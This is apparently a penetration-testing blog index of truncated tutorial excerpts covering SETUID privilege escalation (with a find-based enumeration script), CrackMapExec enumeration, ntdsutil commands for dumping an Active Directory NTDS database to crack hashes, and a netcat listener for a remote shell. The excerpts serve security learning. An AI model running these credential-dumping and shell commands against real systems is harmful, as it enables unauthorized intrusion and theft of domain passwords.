[ Pen Testing ] :: Step by Step :: Exploiting SETUID

This entry is part 1 of 1 in the series [ Penetration Testing ]

Setting the set-user-ID (SETUID) bit on an executable means it runs with the permissions of the file's owner, not those of the user who launches it. It's highly useful in system administration, but it's dangerous too, because every SETUID file, and especially every root-owned one, is a potential privilege-escalation vector. John Hammond (on YouTube) gives an excellent example in the context …
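As an added example (not code from the original post or from John Hammond's video), the enumeration step a pentester runs first on a fresh Linux foothold: list every file with the SETUID bit set, and show who owns it, since a root-owned one runs with an effective UID of 0 for whoever executes it. The functions also cover the SETGID bit, which the post does not mention but which is the same class of problem. Directory and function names here are my own.

```shell
#!/bin/sh
# Added example, not from the original post. Mode bit 4000 is SETUID and
# 2000 is SETGID; "-perm -4000" matches files that have that bit set
# regardless of their other permission bits.

# List SETUID files under a directory (default: /). "Permission denied"
# noise from find is discarded so the output is just paths.
find_setuid() {
    find "${1:-/}" -xdev -type f -perm -4000 2>/dev/null
}

# Same, but for files with either SETUID or SETGID set (a superset of
# find_setuid): SETGID binaries hand out the group's privileges instead.
find_setid_bits() {
    find "${1:-/}" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null
}

# Show mode and owner for each SETUID file, so root-owned ones stand out.
list_setuid_with_owner() {
    find "${1:-/}" -xdev -type f -perm -4000 -exec ls -ld {} \; 2>/dev/null
}

# Typical use on a target (searches the whole system):
# list_setuid_with_owner /
```

-xdev keeps the search on one filesystem, so remember to run it once per mount point of interest (or drop the flag) if /usr or /opt is mounted separately.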

Study Hacking With Code Red: Free Video Courses

This entry is part 1 of 1 in the series Pen Testing Windows

You should try this. If you seriously want to learn hacking, you should check out EC-Council's Code Red training site. I've been checking out the free-level offerings, and I'm impressed. Go here and create an account, with the usual precautions: https://codered.eccouncil.org/Home Do you use Python? (Of course you do.) Here's a link to a course …

[ Pen Testing Windows ] :: Penetration Testing Windows: Powershell/Empire

Powershell

Powershell is the object-oriented replacement for the ancient Windows cmd.exe. It is not present by default on older installations of Windows, but can be added via a download from Microsoft. There are five versions of Powershell at the moment (2018). You can start it by typing powershell in the Run line or in cmd. Before going any …

[ Pen Testing Windows ] :: Penetration Testing Windows: CrackMapExec

Hacking in the dark

Gather Your Tools

First off, be a smart hacker and know how to find great online materials, like this how-to: https://byt3bl33d3r.github.io/getting-the-goods-with-crackmapexec-part-1.html And this excellent tutorial on CrackMapExec: https://www.ivoidwarranties.tech/posts/pentesting-tuts/cme/crackmapexec/

For the TL;DR of that page, start in Bash:

# get syntax and details
python crackmapexec.py

# network enumeration
python crackmapexec.py 192.168.1.0/24

Executing Commands

Note that if …

[ Pen Testing Windows ] :: Active Directory: Extracting NTDS and Cracking Hashes

Glenn Norman

Okay, you've gotten SYSTEM-level access on your Windows target, which for this step needs to be a domain controller, and now you want the goodies in Active Directory. Here's the ultra-short version. Open Powershell and enter:

ntdsutil
activate instance ntds
ifm
create full c:\bak_fldr
quit
quit

Check out this video that details creating the NTDS backup, extracting data with secretsdump.py, https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py , and cracking password …

[ Pen Testing ] :: Step by Step: Uploading Shellcode and Upgrading the Shell

Blue Security Goddess

Getting a Remote Shell

Let's assume you've found some sort of access to your target, ideally an upload vulnerability that will let you get some shellcode onto the target.

Netcat

You could just start a Netcat listener on the victim, if Netcat is available:

nc -lvnp 1234

… and start a shell on the attack …